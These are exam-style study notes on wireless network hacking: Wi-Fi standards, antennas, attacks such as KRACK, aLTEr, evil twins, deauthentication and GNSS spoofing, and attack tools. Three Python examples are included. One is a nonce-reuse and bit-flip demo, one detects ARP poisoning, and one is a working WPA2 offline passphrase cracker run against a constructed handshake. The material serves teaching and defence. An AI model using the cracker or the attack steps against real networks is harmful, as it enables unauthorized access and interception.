M16 Hacking Wireless Networks
Ad-Hoc Connection Attack
- Ad-Hoc Mode (peer-to-peer, roughly like AirDrop)
  o Allows clients to communicate with each other directly WITHOUT an AP
  o Allows data to be conveniently shared
  o Does NOT provide strong authentication or encryption
- Attacker connects directly to a client operating in Ad-Hoc Mode
Frequency-hopping spread spectrum (FHSS)
- AKA Frequency-hopping code-division multiple access (FH-CDMA)
- Transmits radio signals by rapidly switching a carrier among many frequency channels
- Makes unauthorized interception and narrowband jamming less effective, because the signal is only briefly on any one channel
- Transmitter hops between available frequencies in a pseudorandom sequence generated by an algorithm known to both sender and receiver
(4) Launch of Wireless Attacks
Aircrack-ng Suite
WPA3 Cracking Techniques
- Downgrade Security Attacks: force the connection down to WPA2 and attack it there
  o Exploiting backward compatibility: a WPA3 network in transition mode also accepts WPA2 clients with the same passphrase; the attacker runs a WPA2-only AP with the target SSID, captures the WPA2 four-way handshake, and cracks the passphrase offline
  o Exploiting the Dragonfly handshake: force the client onto a weaker security group (curve) than it would otherwise negotiate
- Side-Channel Attacks (Dragonblood)
  § Timing-based attack: the password-to-element ("hunt-and-peck") loop runtime depends on the password
  § Cache-based attack: memory-access patterns of the password-encoding code leak password information
802.11d
Enhancement to 802.11a and 802.11b that enables global portability: allows variations in frequencies, power levels, and bandwidth according to the country/regulatory domain
Brute forcing of WPA keys
- Perform a brute-force or dictionary attack on the WPA passphrase (offline, against a captured handshake) using tools such as aircrack-ng, aireplay-ng, or KisMAC
- May take hours, days, or even weeks depending on passphrase strength, wordlist, and hardware
iCopy-X
- Portable RFID cloning device
- Entirely stand-alone device with an integrated screen and buttons = does NOT need an external computer
Reflector Antennas
- Reflect radio signals; high manufacturing cost
- Concentrate EM energy radiated or received at a focal point
- Generally parabolic
Jamming Signal Attack
- DoS at the radio layer: floods the channel with RF energy so legitimate devices cannot transmit (not a flood of network traffic)
- Uses dedicated hardware (a jammer) to perform the attack
  o Generates signals that appear to be noise to the devices on the network
  o Causes them to hold their transmissions (CSMA/CA sees a busy medium) until the signal subsides
Honeypot/Honeypot AP Attack
- Set up an unauthorized wireless network using a rogue AP that impersonates the target
- Uses high-power (high-gain) antennas
- Uses the same SSID as the target network
- Transmits a stronger beacon signal than the legitimate APs, so clients prefer it
Authentication Attacks
- Steal the identity of Wi-Fi clients: their personal information, login credentials, etc.
- Goal: gain unauthorized access to network resources
Parabolic Grid Antenna
- Uses the same principle as a satellite dish but with NO solid dish
- Consists of a semi-dish in the form of a grid of aluminum wires
- Can achieve very-long-distance Wi-Fi transmissions through highly focused radio beams
- Useful for transmitting weak radio signals over very long distances (about 10 miles)
- Can receive Wi-Fi signals that are either horizontally or vertically polarized
Sniffing Tools
- Wireshark with Npcap - SteelCentral Packet Analyzer - OmniPeek Network Protocol Analyzer - CommView for Wi-Fi - Kismet
De-authentication Attack
- Attacker floods station(s) with forged de-authentication or disassociation frames to disconnect users from an AP
- Works because these management frames are unauthenticated unless 802.11w (Protected Management Frames) is enabled
Global System for Mobile Communications (GSM)
- universal system used for mobile data transmission in wireless networks worldwide
802.11a
Frequency: 3.7 GHz and 5 GHz; Modulation: OFDM; Speeds: 6, 9, 12, 18, 24, 36, 48, 54 Mbps; Range: 35-100 m (up to 5,000 m at 3.7 GHz)
WPA2
Authentication: 802.1X/EAP (Enterprise) or PSK (Personal); Encryption algorithm: AES; Encryption method: CCMP; Key size: 128 bits (CCMP uses AES-128); Data integrity: CBC-MAC (the MAC half of CCM); IV/nonce length: 48 bits (packet number)
WPA3
Authentication: 802.1X/EAP (Enterprise) or SAE/Dragonfly (Personal; replaces PSK); Encryption algorithm: AES; Encryption method: CCMP-128 (Personal), GCMP-256 in the 192-bit Enterprise mode; Key size: 128/192 bits (Personal/Enterprise); Data integrity: CCMP/GCMP tag, plus BIP-GMAC-256 for protected management frames in the 192-bit suite; IV/nonce length: 48 bits
WPA
Authentication: 802.1X/EAP (Enterprise) or PSK (Personal); Encryption algorithm: RC4; Encryption method: TKIP; Key size: 128 bits; Data integrity: MIC (Michael) and CRC-32; IV length: 48 bits (TKIP sequence counter)
WarDriving
o Attackers drive around with Wi-Fi-enabled laptops running a wireless discovery tool to map out open wireless networks.
  § Send probe requests (active scanning) or listen for beacons (passive scanning)
- Drive at 35 mph or below (at higher speeds the Wi-Fi adapter does not dwell on a channel long enough to detect networks).
WarFlying
o Attackers use drones to detect open wireless networks.
Wormhole Attack
- Exploits dynamic routing protocols such as Dynamic Source Routing (DSR) and Ad-Hoc On-Demand Distance Vector (AODV)
- Attacker places a node in the target network to sniff wireless transmissions
- From this location, the attacker advertises that the malicious node has the shortest route for transmitting data
- Attacker creates a tunnel to forward the data between the source and destination nodes
- Impacts the confidentiality, integrity, and availability of network data
Key Reinstallation Attack (KRACK)
- Exploits flaws in the implementation of the WPA2 four-way handshake
- Four-way handshake
  o Establishes the connection
  o Generates a fresh session key (PTK) used to encrypt the network traffic
- Forcing nonce reuse
  o Attacker positioned between client and AP blocks or delays message 4 and replays message 3; the client reinstalls the already-in-use key and resets its packet nonce and replay counter
  o The per-packet nonce is therefore reused with the same key; the resulting keystream reuse lets the attacker decrypt and replay frames (and, depending on the cipher, forge them)
Inter-Chip Privilege Escalation/Wireless Co-Existence Attack
- Exploits vulnerabilities in wireless chips
- Combo chip = a single chip designed for Bluetooth AND Wi-Fi, sharing resources between the two radios
- Attackers leverage the shared interfaces of combo chips to pivot from one radio to the other and steal data
- Bluetooth chip can capture sensitive data from the Wi-Fi chip
  o OR can manipulate data going through the Wi-Fi chip
Misconfigured AP Attack
- Exposes the network to attack
- Difficult to detect a misconfigured AP because it is an authorized, legitimate device
- Causes: SSID broadcast, weak password, configuration errors (default configs)
(1) Wi-Fi Discovery
- Find a Wi-Fi network or device
- Use tools such as inSSIDer and NetSurveyor
- Footprint the wireless networks and find the appropriate target
De-authentication attack
- Find an actively connected client
- Attacker forces the client to disconnect from the AP
- Use aireplay-ng to send the de-authentication, then capture the four-way handshake when the client reconnects
  o The handshake carries the nonces and a MIC computed from keys derived from the pairwise master key (PMK); the PMK itself is never transmitted, but the capture lets the attacker test passphrase guesses offline (dictionary or brute force)
Wi-Jacking Attack
- Force the user's browser to a malicious site by creating an evil twin with KARMA, then abuse the browser's saved router credentials
  o Preconditions: the client device's browser must have stored the router's admin-interface credentials, AND the target network's router must serve its admin interface over unencrypted HTTP (so the saved credentials auto-fill over a connection the attacker controls)
aLTEr Attack
- Forces the victim to visit a malicious website via DNS spoofing on LTE
- Exploits LTE user-plane data being encrypted in AES counter mode (AES-CTR) with NO integrity protection, so ciphertext bits can be flipped without the key
- Attacker installs a virtual (fake) tower as a relay between the two authentic endpoints (the user's device and the real tower) and uses it to intercept the data stream
- Uses the relay to hijack the active LTE session
- Flips bits in the encrypted DNS request so its destination becomes the attacker's DNS server, which answers with spoofed records and redirects the victim to malicious websites
- Attacker thereby controls browsing data and can modify user inputs via the spoofed DNS server
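Both KRACK (nonce reuse) and aLTEr (ciphertext malleability) are consequences of the same property of counter-mode stream encryption. The following is an added example, not code from the original notes: HMAC-SHA256 stands in for the AES block function (an assumption, to keep it dependency-free; the XOR structure the attacks exploit is identical to AES-CTR/CCMP), the packet layout and the 203.0.113.5 "rogue resolver" are constructed, and a real IPv4 header also carries a checksum that is not modeled here.

```python
import hashlib
import hmac


def ctr_keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream. HMAC-SHA256(key, nonce || counter) stands in for
    AES(key, nonce || counter); only the XOR-with-keystream structure matters here."""
    blocks = []
    counter = 0
    while sum(len(b) for b in blocks) < length:
        blocks.append(hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest())
        counter += 1
    return b"".join(blocks)[:length]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def ctr_crypt(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Encryption and decryption are the same operation in a stream mode."""
    return xor(data, ctr_keystream(key, nonce, len(data)))


# --- KRACK: the same key/nonce pair used for two different frames ---

def recover_second_plaintext(c1: bytes, p1_known: bytes, c2: bytes) -> bytes:
    """C1 xor C2 = P1 xor P2 when key and nonce repeat. With P1 known (a predictable
    header, or a frame the attacker injected) the attacker recovers as many bytes of
    P2 as it has keystream for, without ever learning the key."""
    keystream = xor(c1, p1_known)
    return xor(c2, keystream)


# --- aLTEr: no integrity check, so ciphertext can be rewritten blind ---

DST_OFFSET = 16  # destination address offset in the constructed 20-byte IP-like header


def build_packet(dst_ip: bytes, payload: bytes) -> bytes:
    """Constructed user-plane packet: 20-byte header with the destination at DST_OFFSET."""
    header = bytearray(20)
    header[0] = 0x45
    header[2:4] = (20 + len(payload)).to_bytes(2, "big")
    header[16:20] = dst_ip
    return bytes(header) + payload


def redirect_ciphertext(ciphertext: bytes, old_dst: bytes, new_dst: bytes) -> bytes:
    """Flip only the bits that differ between old and new destination:
    decrypt(C xor d) = P xor d in any unauthenticated stream mode."""
    delta = xor(old_dst, new_dst)
    c = bytearray(ciphertext)
    for i, d in enumerate(delta):
        c[DST_OFFSET + i] ^= d
    return bytes(c)


def demo() -> dict:
    key = hashlib.sha256(b"session-key-example").digest()  # constructed session key
    nonce = bytes.fromhex("000000000001")  # 48-bit packet number, deliberately reused below

    # KRACK scenario: packet number reset -> same nonce for two different frames
    p1 = b"GET /index.html HTTP/1.1\r\n"
    p2 = b"Authorization: Basic YWRtaW46aHVudGVyMg==\r\n"
    c1 = ctr_crypt(key, nonce, p1)
    c2 = ctr_crypt(key, nonce, p2)
    recovered = recover_second_plaintext(c1, p1, c2)  # prefix of p2, length of p1

    # aLTEr scenario: DNS request to the real resolver, redirected to the attacker's
    real_resolver = bytes([8, 8, 8, 8])
    rogue_resolver = bytes([203, 0, 113, 5])  # TEST-NET-3 address, constructed
    dns_query = b"\x12\x34\x01\x00\x00\x01" + b"\x05login\x07example\x03com\x00\x00\x01\x00\x01"
    c_dns = ctr_crypt(key, nonce, build_packet(real_resolver, dns_query))
    c_mod = redirect_ciphertext(c_dns, real_resolver, rogue_resolver)
    decrypted = ctr_crypt(key, nonce, c_mod)  # what the far end sees after the flip
    return {
        "p1": p1, "p2": p2, "recovered_p2": recovered,
        "redirected_dst": decrypted[DST_OFFSET:DST_OFFSET + 4],
        "payload_intact": decrypted[20:] == dns_query,
    }


if __name__ == "__main__":
    print(demo())
```

The defence in both cases is the same: never reuse a nonce under one key (KRACK's fix is to refuse key reinstallation) and authenticate the ciphertext (CCMP's CBC-MAC, or LTE integrity protection of the user plane) so that flipped bits are rejected.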
WEP Encryption Cracking
- Gather a large number of IVs
  o Done by listening to traffic
- WEP packet injection
  o Expedites the IV-gathering process and allows capturing a large number of IVs in a short period
GNSS Spoofing
- Global Navigation Satellite System (GNSS)
- Attacker modifies the target's GNSS signal measurements (position, navigation, and time = PNT)
- Broadcasts the same signals to the target's GNSS receiver
- User's GNSS receiver believes them to be authentic
- Forces the system to display false positions and times
Rogue AP Attack
- Installed in the network = allows unauthorized users to connect to that network
- Unauthorized (or rogue) APs can allow anyone with an 802.11-equipped device to connect to a corporate network
- The attacker lures the user to connect to the rogue AP by advertising the SSID
- If the user connects to the rogue AP under the impression that it is a legitimate AP, all the traffic from the user passes through the rogue AP
- Allows the attacker to sniff traffic flowing through the rogue AP
Confidentiality Attack
- Intercept confidential information
- An attacker may attempt to break the encryption
Tools to discover Wi-Fi networks
- Laptop with a Wi-Fi card
- External Wi-Fi antenna
- Network discovery software: inSSIDer, NetSurveyor, Wi-Fi Scanner, Acrylic Wi-Fi Home, WirelessMon, Ekahau Wi-Fi Heatmaps
Manipulation (MITM)
- A level beyond eavesdropping
- Attacker receives the victim's encrypted data, manipulates it, and retransmits the manipulated data to the victim
- Attacker can intercept packets with encrypted data and change the destination address to forward packets across the Internet
Availability Attacks
- Make wireless network services unavailable to legitimate users
- Obstruct the delivery of wireless services
- By crippling WLAN resources or by denying users access to them
(2) GPS Mapping
- Map the network: draw a map of the discovered networks using the GPS coordinates recorded during discovery
GPS Mapping Tools
- Maptitude Mapping Software - Skyhook - ExpertGPS - GPS Visualizer - Mapwel - TrackMaker
Orthogonal frequency-division multiplexing (OFDM)
- Method of digital modulation of data
- A signal is split across multiple sub-carrier frequencies that are orthogonal to each other (in the signal-processing sense: spaced so that each sub-carrier's peak falls on the others' nulls and they do not interfere; not literally "at right angles")
Service set identifier (SSID)
- NAME of the network = an identifier of up to 32 characters (octets) given to a wireless local area network (WLAN); it is sent in cleartext and is not a secret
Client Mis-Association - user connects to someone else's AP
- A network client mistakenly (or through attacker inducement) connects to a neighboring AP instead of the intended one
Configuration error (Misconfigured AP Attack)
- No password configured
- Errors made during installation
- Inconsistent configuration policies on an AP
- Human errors made while troubleshooting WLAN problems
- Security changes not implemented uniformly across an architecture
- SSID broadcasting with a default or guessable SSID helps attackers learn the SSID; where the SSID is (wrongly) relied on as an access secret, a client presenting it looks like a legitimate connection attempt to the AP
WPA Cracking Techniques
- The passphrase and the PMK are never transmitted: the practical way to crack WPA/WPA2-Personal is to capture the four-way handshake (or a PMKID) and test candidate passphrases offline against the MIC derived from the PMK
Automated Spectrum Analysis Tools
- RF Explorer
Additional RFID cloning tools:
- RFIDler - RFID Mifare Cloner - Proxmark3 - Boscloner Pro
Omnidirectional Antenna
- Radiates electromagnetic (EM) energy in all directions
- Provides a 360° horizontal radiation pattern
- Radiates strong waves uniformly in two dimensions, but the waves are usually not as strong in the third dimension
- Efficient in areas where wireless stations use time-division multiple access technology
- Good for radio towers and for cases where receivers may be moving
WPA3 Encryption Cracking
- WPA3-Personal replaces WPA2's PSK authentication with the Dragonfly (SAE) handshake, designed to resist offline dictionary attacks
- Dragonfly SAE implementations are still vulnerable to password cracking via side channels and downgrades
- Dragonblood
  o Set of vulnerabilities in WPA3 allowing password/key recovery, security-mechanism downgrades, and information theft
- Tools = Dragonslayer, Dragonforce, Dragondrain, and Dragontime
Dipole Antenna (doublet)
- Straight electrical conductor measuring half a wavelength from end to end
- Connected at the center to the radio frequency (RF) feed line
- Fed by a balanced parallel-wire RF transmission line
MAC Spoofing Tools
- Technitium MAC Address Changer
  o Allows a user to change (spoof) the MAC address of their NIC instantly
  o Has a user interface and provides information on each NIC in the machine
Wireless ARP Poisoning Attack
- The ARP cache maintained by the OS is corrupted with wrong MAC addresses
- Attacker sends a forged ARP reply packet that maps the victim's (or the gateway's) IP address to the attacker's MAC address
- Impacts all the hosts in a subnet
  o All hosts connected to the same switch or hub (or, on Wi-Fi, the same BSS) are susceptible to ARP poisoning
- Traffic addressed to the victim's IP is then delivered to the attacker's MAC, enabling sniffing or MITM
- Use Ettercap for ARP attacks
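Detection of ARP poisoning comes down to watching ARP replies for bindings that change or that nobody asked for. The following is an added example (not from the original notes): a minimal Ethernet/ARP parser and a watcher that flags unsolicited replies, sender-MAC mismatches, and IP-to-MAC binding changes. All addresses and frames are constructed; the attacker MAC 02:00:de:ad:be:ef is hypothetical.

```python
import struct
from collections import defaultdict

ETH_P_ARP = 0x0806


def build_arp(src_mac: bytes, dst_mac: bytes, op: int,
              sha: bytes, spa: bytes, tha: bytes, tpa: bytes) -> bytes:
    """Ethernet II header + 28-byte ARP body. op 1 = request, 2 = reply."""
    eth = dst_mac + src_mac + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op) + sha + spa + tha + tpa
    return eth + arp


def parse_arp(frame: bytes):
    """Return a dict of ARP fields, or None for non-ARP / truncated frames."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    _, _, _, _, op = struct.unpack("!HHBBH", frame[14:22])
    return {
        "op": op,
        "sha": frame[22:28], "spa": frame[28:32],
        "tha": frame[32:38], "tpa": frame[38:42],
        "eth_src": frame[6:12],
    }


def mac_str(m: bytes) -> str:
    return ":".join(f"{b:02x}" for b in m)


def ip_str(i: bytes) -> str:
    return ".".join(str(b) for b in i)


class ArpWatch:
    """Learn IP->MAC bindings from replies; alert on the signs of poisoning."""

    def __init__(self):
        self.table = {}                    # ip -> mac, as a naive OS cache would keep it
        self.pending = defaultdict(set)    # requested ip -> MACs that asked for it
        self.alerts = []

    def feed(self, frame: bytes):
        a = parse_arp(frame)
        if a is None:
            return
        if a["op"] == 1:                   # request: remember who asked for what
            self.pending[a["tpa"]].add(a["sha"])
            return
        if a["op"] != 2:
            return
        ip, mac = a["spa"], a["sha"]
        if mac != a["eth_src"]:            # ARP sender MAC should match the Ethernet source
            self.alerts.append(("sender-mac-mismatch", ip_str(ip), mac_str(mac)))
        if a["tha"] in self.pending[ip]:   # answers an outstanding request: expected
            self.pending[ip].discard(a["tha"])
        else:                              # nobody asked: gratuitous or forged
            self.alerts.append(("unsolicited-reply", ip_str(ip), mac_str(mac)))
        known = self.table.get(ip)
        if known is not None and known != mac:
            self.alerts.append(("binding-changed", ip_str(ip),
                                f"{mac_str(known)} -> {mac_str(mac)}"))
        self.table[ip] = mac               # the cache is overwritten regardless: that is the attack


def demo() -> ArpWatch:
    # Constructed hosts: gateway, victim, attacker on one 192.168.1.0/24 BSS.
    gw_ip, gw_mac = bytes([192, 168, 1, 1]), bytes.fromhex("aabbcc000001")
    victim_ip, victim_mac = bytes([192, 168, 1, 50]), bytes.fromhex("c4e9840f1234")
    attacker_mac = bytes.fromhex("0200deadbeef")
    broadcast = b"\xff" * 6
    frames = [
        build_arp(victim_mac, broadcast, 1, victim_mac, victim_ip, bytes(6), gw_ip),   # who has gateway?
        build_arp(gw_mac, victim_mac, 2, gw_mac, gw_ip, victim_mac, victim_ip),        # legitimate reply
        build_arp(attacker_mac, victim_mac, 2, attacker_mac, gw_ip, victim_mac, victim_ip),  # poison
    ]
    w = ArpWatch()
    for f in frames:
        w.feed(f)
    return w


if __name__ == "__main__":
    for alert in demo().alerts:
        print(alert)
```

The same logic is what tools like arpwatch implement; on Wi-Fi the usual mitigations are client isolation on the AP and dynamic ARP inspection on the wired side.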
Basic service set identifier (BSSID)
- The MAC address of an access point (AP) or base station that has set up a basic service set (BSS)
Fragmentation Attack
- The aircrack-ng suite (aireplay-ng) helps the attacker obtain a small amount of keystream (PRGA), not the key itself, from a captured WEP packet
- aireplay-ng sends fragments to the AP, which relays (echoes) them; from the known content the attacker recovers up to about 1,500 bytes of keystream, which can then be used with packetforge-ng to inject arbitrary packets
Choosing the Optimal Wi-Fi Card
- Tools such as aircrack-ng and KisMAC work only with selected wireless chipsets
- Consider the following when choosing a card
  o Determine the Wi-Fi requirements
  o Learn the capabilities of the wireless card
  o Determine the chipset of the Wi-Fi card
  o Verify the chipset capabilities
  o Determine the drivers and patches required
802.16 (WiMAX)
Frequency: 2-11 GHz; Modulation: SOFDMA; Speeds: 34-1000 Mbps; Range: 1,609-9,656 m (1-6 miles)
Multiple input, multiple output-orthogonal frequency-division multiplexing (MIMO-OFDM)
- Air-interface (transmission/modulation) scheme that combines multiple transmit and receive antennas (spatial multiplexing and diversity) with OFDM; used by 802.11n and later
- Note: "multiplying the original data signal with a pseudo-random noise-spreading code" describes direct-sequence spread spectrum (DSSS, used by 802.11 and 802.11b), not MIMO-OFDM; the spreading is what gives DSSS its resistance to narrowband interference and jamming
Evil Twin
- AP that pretends to be a legitimate AP by imitating its SSID
- Set up as a rogue AP outside the network perimeter
- Lures users into signing into this AP
- Tools: KARMA
Rogue AP
- APs an attacker installs on a network without authorization
- NOT under the management of the admin
  o NOT configured for security
- Provide backdoor access to the wireless network
- Tools: MANA Toolkit
Tools
- Aircrack-ng - Wifiphisher - Reaver
Eavesdropping (MITM)
- An attacker in the vicinity of a wireless network can receive its radio waves without much effort or equipment
- Attacker can examine the entire data frame and store it
(3) Wireless Traffic Analysis
- Analyze the captured traffic
- Identify the vulnerabilities and susceptible victims
Sinkhole Attack
- Attacker advertises a compromised or malicious node as the shortest possible route
- Attacker places the malicious node near the base station and attracts all the neighboring nodes with fake routing-path information
- Sniffs and manipulates the data drawn to the node
AP MAC Spoofing
- Attacker spoofs the MAC address of the AP by programming a rogue AP to advertise the same identity information (BSSID and SSID) as the legitimate AP
- Attacker spoofs their client MAC to look like an authorized client and connects to the AP = bypasses MAC filtering on the AP
Man-in-the-Middle Attack (MITM)
- Attacker intercept, read, or alter info transmitted between 2 computers
Disassociation Attack
- Attacker makes the victim unavailable to other wireless devices by breaking the association between the AP and the client with forged disassociation frames
GPS
- Attacker uses this GPS utility to locate and map the target wireless network in a geographical area
Meaconing Method (GNSS)
- Attackers block and re-broadcast the original signals to the receiver
- Effective with mono- and multi-antenna meaconers that control multiple satellite signals
- Allows attackers to manipulate the original signal with false positioning data
Interrupting the Lock Mechanism (GNSS)
- Attackers aim to capture a GNSS receiver's new lock with a faulty signal
- Start radiating a jamming signal at the GNSS receiver so that the receiver drops lock and starts the next acquisition
- A signal simulator generates a false signal, transmits it to the GNSS receiver, and obtains the new lock
- Attackers then control the receiver's location data by feeding it the false signal
MAC Spoofing Attack
- Attackers change their MAC address to that of an authenticated user to bypass the MAC filtering configured on an AP
- To spoof a MAC address the attacker simply reconfigures the interface (the address ifconfig/ip reports) to another hex value in the format aa:bb:cc:dd:ee:ff
Drag-off Strategy (GNSS)
- Attackers track the receiver's position and gradually drag it from the original location to a fake one
- Attacker mirrors the original navigation signals, injects a progressive misalignment between them, and forwards them to the GNSS receiver
- The gradual drift protects attackers from detection by radar systems
Cancellation Methodology (GNSS)
- Attackers use dual signal transmission to cancel out individual authentic signals while introducing false satellite data
- Used for extracting the code-phase data, but limited in terms of matching amplitude and carrier phase
Directional Antenna
- Broadcasts and receives radio waves from a single direction
- Works effectively in only a few directions = reduces interference
WPA/WPA2 Encryption Cracking
- Can still be cracked if the right packets (the four-way handshake) are captured and the passphrase is weak
Offline attack
- Capture the WPA/WPA2 authentication handshake
- Crack the passphrase offline
- Capturing a full authentication handshake between a client and the AP is what makes offline WPA/WPA2 cracking possible
RFID Cloning Attack
- Capture the data from an RFID tag and create its clone on a new chip
- Data from one RFID tag is copied into another tag; the new chip normally carries its own factory-programmed tag ID (TID)
- Because of the differing TID, the cloned copy is not identical to the original and may be detected unless a chip with a writable/emulated ID is used
- Use iCopy-X, RFIDler, etc. to clone RFID tags
Integrity Attack
- Change data during transmission
- Attackers send forged control, management, or data frames to misdirect wireless devices
(5) Wi-Fi Encryption Cracking
- Crack the WEP or WPA/WPA2 encryption
Denial-of-Service Attack
- Disrupt wireless network connections by broadcasting forged de-authentication frames
Yagi Antenna (Yagi-Uda)
- Unidirectional antenna commonly used in communications from the 10 MHz band up through VHF and UHF
- High gain, and an improved signal-to-noise ratio (SNR) in its pointing direction
- Unidirectional radiation and response pattern
- Concentrates the radiation and response
- Consists of a reflector, a driven dipole, and one or more directors
- Develops an end-fire radiation pattern
WPA PSK
- Uses a user-defined passphrase (via the PMK derived from it) to key the four-way handshake
- User provides the passphrase to the client; AP and client both hold the derived PMK
- Capture the WPA-PSK handshake, whose MIC depends on the passphrase = brute-forced offline with a dictionary attack
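Worked example of the offline attack these notes describe under brute forcing of WPA keys, the de-authentication attack, WPA cracking techniques, the offline attack, and WPA PSK: derive PMK and PTK exactly as WPA2-Personal specifies, recompute the message-2 MIC for each candidate passphrase, and stop on a match. This is an added example, not code from the original notes or from aircrack-ng; the "captured" handshake (MACs, nonces, EAPOL-Key frame) is constructed inside the block from a known passphrase, and the wordlist is made up. The PMK derivation is checked against the IEEE 802.11i Annex H test vector.

```python
import hashlib
import hmac
from typing import Optional

# --- Key derivation as specified for WPA2-Personal (IEEE 802.11i) ---

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, concatenated."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK, AP MAC (AA), client MAC (SPA) and the two handshake nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


# EAPOL hdr(4) + descriptor(1) + key info(2) + key len(2) + replay(8) + nonce(32) + IV(16) + RSC(8) + ID(8)
MIC_OFFSET = 81


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """WPA2 key descriptor version 2: HMAC-SHA1 over the frame with the MIC field zeroed, truncated to 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(capture: dict, wordlist) -> Optional[str]:
    """Offline dictionary attack: the handshake never carries the PMK, but each guess
    yields a KCK whose MIC over message 2 can be compared with the captured one."""
    captured_mic = capture["eapol2"][MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = derive_pmk(candidate, capture["ssid"])
        ptk = derive_ptk(pmk, capture["aa"], capture["spa"], capture["anonce"], capture["snonce"])
        kck = ptk[:16]  # first 128 bits of the PTK = Key Confirmation Key
        if hmac.compare_digest(eapol_mic(kck, capture["eapol2"]), captured_mic):
            return candidate
    return None


# --- Constructed handshake capture (stands in for a real pcap) ---

RSN_IE = bytes.fromhex("3014" "0100" "000fac04" "0100" "000fac04" "0100" "000fac02" "0000")  # CCMP / PSK


def build_message2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """EAPOL-Key message 2 of 4 (client -> AP) with the given MIC field."""
    body = (
        b"\x02"                      # descriptor type: RSN
        + b"\x01\x0a"                # key info: pairwise, MIC present, HMAC-SHA1 (version 2)
        + b"\x00\x00"                # key length
        + (1).to_bytes(8, "big")     # replay counter
        + snonce + bytes(16) + bytes(8) + bytes(8)   # SNonce, key IV, RSC, key ID
        + mic
        + len(RSN_IE).to_bytes(2, "big") + RSN_IE    # key data: the client's RSN element
    )
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # 802.1X v2, type EAPOL-Key


def make_capture(passphrase: str, ssid: str) -> dict:
    """Simulate what a sniffer records after a deauth forces the client to reconnect. All values constructed."""
    aa = bytes.fromhex("00112233aabb")     # AP MAC
    spa = bytes.fromhex("c4e9840f1234")    # client MAC
    anonce = hashlib.sha256(b"anonce-example").digest()
    snonce = hashlib.sha256(b"snonce-example").digest()
    ptk = derive_ptk(derive_pmk(passphrase, ssid), aa, spa, anonce, snonce)
    eapol2 = build_message2(snonce, eapol_mic(ptk[:16], build_message2(snonce)))
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce, "eapol2": eapol2}


if __name__ == "__main__":
    cap = make_capture("correcthorse", "CorpWiFi")
    print(crack(cap, ["password", "letmein1", "correcthorse", "Summer2024"]))
```

Each guess costs 4,096 HMAC-SHA1 iterations plus the PRF, which is why real tools offload PBKDF2 to GPUs and why passphrase length, not handshake secrecy, decides the outcome.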
WEP Cracking
- wesside-ng = automated WEP cracking tool
  o Finds and associates with a WEP network, gathers IVs, and recovers the key
Wi-Fi Hotspot Finder Tools
- Wi-Fi Finder - Homedale::Wi-Fi/WLAN Monitor - Fing - Network Tools - WiFi Finder - Free WiFi Map - WiFi Map - Find Wifi & Connect to Wi-Fi
Wireless Hacking Methodology
- Wi-Fi discovery - GPS mapping - Wireless traffic analysis - Launch of wireless attacks - Wi-Fi encryption cracking - Wi-Fi network compromising
Mobile-based Wi-Fi Discovery Tools
- WiFi Analyzer - Opensignal - Network Signal Info Pro - WiFi Manager - Network Refresher: Network Signal Refresher - WiFi Scanner - WiGLE
Denial-of-Service: Disassociation and De-authentication Attacks
- Wireless DoS attacks include:
  o Disassociation attacks
  o De-authentication attacks
802.15.4 (ZigBee)
Frequency: 0.868, 0.915, 2.4 GHz; Modulation: O-QPSK, GFSK, BPSK; Speeds: 0.02, 0.04, 0.25 Mbps; Range: 1-100 m
Unauthorized Association - someone else connects to you
- 2 Forms
  o Accidental
    § Connecting to the target network's AP from a neighboring organization's overlapping network without the victim's knowledge
  o Malicious
    § Done using soft APs
    § The attacker infects the victim's machine and activates a soft AP, allowing an unauthorized connection to the network
802.11b
Frequency: 2.4 GHz; Modulation: DSSS; Speeds: 1, 2, 5.5, 11 Mbps; Range: 35-140 m
802.11
Frequency: 2.4 GHz; Modulation: DSSS, FHSS; Speeds: 1 and 2 Mbps; Range: 20-100 m
802.15.1 (Bluetooth)
Frequency: 2.4 GHz; Modulation: GFSK, π/4-DPSK, 8DPSK; Speeds: 25-50 Mbps as listed in these notes (note: Bluetooth BR/EDR actually tops out at 3 Mbps and Bluetooth LE at 2 Mbps); Range: 10-240 m
802.11g
Frequency: 2.4 GHz; Modulation: OFDM; Speeds: 6, 9, 12, 18, 24, 36, 48, 54 Mbps; Range: 38-140 m
802.11n
Frequency: 2.4 and 5 GHz; Modulation: MIMO-OFDM; Speeds: 54-600 Mbps; Range: 70-250 m
802.11i
A standard for WLANs that provides improved encryption for networks that use 802.11a, 802.11b, and 802.11g standards; defines WPA2-Enterprise/WPA2-Personal for Wi-Fi
802.11e
It provides guidance for prioritization of data, voice, and video transmissions enabling QoS
WEP
Authentication: Open System or Shared Key (both weak; Shared Key leaks keystream to anyone sniffing the challenge); Encryption algorithm: RC4; Encryption method: WEP; Key size: 40 or 104 bits; Data integrity: CRC-32 (linear, so forgeable); IV length: 24 bits (sent in cleartext, reused often)
